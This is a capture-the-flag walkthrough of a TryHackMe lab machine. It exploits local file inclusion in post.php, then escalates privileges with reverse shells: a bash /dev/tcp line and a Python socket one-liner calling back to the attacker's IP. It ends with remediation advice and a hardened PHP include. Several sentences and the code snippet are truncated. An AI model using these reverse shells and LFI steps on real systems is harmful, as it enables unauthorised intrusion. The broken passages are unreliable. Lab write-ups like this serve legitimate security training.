Watcher is a medium-difficulty boot2root CTF room on TryHackMe. In this room you have to collect 7 flags.
First of all we start with basic enumeration. We navigate to the web server on port 80. This web server contains a “robots.txt” file with two entries.
This gives you your first flag. We cannot read the “secret_file_do_not_read.txt” file directly. But the “post” parameter of the PHP script at “http://10.10.73.152/post.php” is vulnerable to local file inclusion (LFI). We can read the /etc/passwd file through that vulnerability.
Next we can read the secret file with the same LFI vulnerability by calling the URL “http://10.10.73.152/post.php?post=secret_file_do_not_read.txt”. The file contains FTP credentials, so now we know that FTP is also running on the target. We can assume that the FTP server is listening on the standard port 21.
After connecting to the FTP server with ftp 10.10.73.152 we see a directory called “files” and the second flag.
Inside the “files” directory we have write access.
We can now upload a reverse shell into that directory. I have used the reverse shell from Pentestmonkey.
Next, start a netcat listener with the command nc -lvnp 1234. From the previous note we know that the FTP directory is located at /home/ftpuser/ftp/. So if we call the URL “http://10.10.73.152/post.php?post=/home/ftpuser/ftp/files/shell.php”, the web server will execute the uploaded PHP and we get a reverse shell.
Now we are on the machine as the www-data user. As www-data we can read the third flag, which is located at
During enumeration we see that we can run all commands as the toby user if we use sudo. So we can elevate our privileges to toby by running the command sudo -u toby /bin/bash. After enumerating further, we spot an interesting cronjob: the script at home/toby/jobs/cow.sh is run as the mat user every minute.
Luckily we have write privileges on that file. This means we can place a reverse shell in it and elevate our privileges to mat. Write the following two lines into the file; you can use the echo command for this.
bash -i >& /dev/tcp/YOUR_MACHINE_IP/8080 0>&1
Next, start a Netcat listener on port 8080 on your machine and wait until the mat user connects to you.
Inside mat’s home folder we can read the fifth flag and find this note.
As you can see we can run the script at
will user. That Python script calls a function from another script called
We have write privileges for the
So we can craft the following malicious Python script on our attacker machine and replace the original cmd.py by transferring it to the victim.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_MACHINE_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
if(num == "1"):
    return "ls -lah"
if(num == "2"):
if(num == "3"):
    return "cat /etc/passwd"
In the next step we need to run another Netcat listener on port 1234 on our attacker machine. Finally, execute the malicious script by running sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py. After that you should get a shell as the will user.
During enumeration as the will user we find an interesting directory, /opt/backup. It contains a file called “key.b64”, which holds base64-encoded data. We can copy that file to our machine and decode it with the command base64 -d key.b64 > sshkey. This is an SSH private key, which we can use to log in as root. First restrict the permissions with chmod 600 sshkey. After that, log in as root with the command ssh -i sshkey email@example.com.
First of all, the LFI vulnerability should be fixed by filtering the “post” parameter before it reaches the include. Furthermore, no secret notes should be accessible through a public web server. File privileges are also set incorrectly and should be fixed. It is also recommended that backups be encrypted.
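As an added example (not the room's own post.php), here is a hardened version of the include: the “post” parameter is matched against a fixed allowlist of post names, so values like /etc/passwd or a path into the FTP upload directory never reach include(). The POST_DIR location and the post names are assumptions.

```php
<?php
// Added example, not the room's post.php: the "post" parameter is mapped to a
// fixed allowlist of post names and never reaches include() as raw user input.
declare(strict_types=1);

const POST_DIR      = __DIR__ . '/posts';           // assumed directory holding the posts
const ALLOWED_POSTS = ['post1', 'post2', 'post3']; // assumed post names

/**
 * Return the absolute path of an allowlisted post, or null if the request
 * names anything else (absolute paths, ../ sequences, files under
 * /home/ftpuser/ftp/ and php:// wrappers all fail the allowlist check).
 */
function resolvePost(string $post): ?string
{
    if (!in_array($post, ALLOWED_POSTS, true)) {
        return null;
    }
    $base = realpath(POST_DIR);
    $path = realpath(POST_DIR . '/' . $post . '.php');
    // Defence in depth: the resolved file must still sit inside POST_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['post'] ?? '';
$path = is_string($requested) ? resolvePost($requested) : null;

if ($path === null) {
    // Log the rejected value so LFI probing is visible in the error log;
    // never echo it back to the client unescaped.
    error_log('post.php: rejected post parameter ' . json_encode($requested));
    http_response_code(404);
    echo 'Post not found';
    exit;
}
include $path;
```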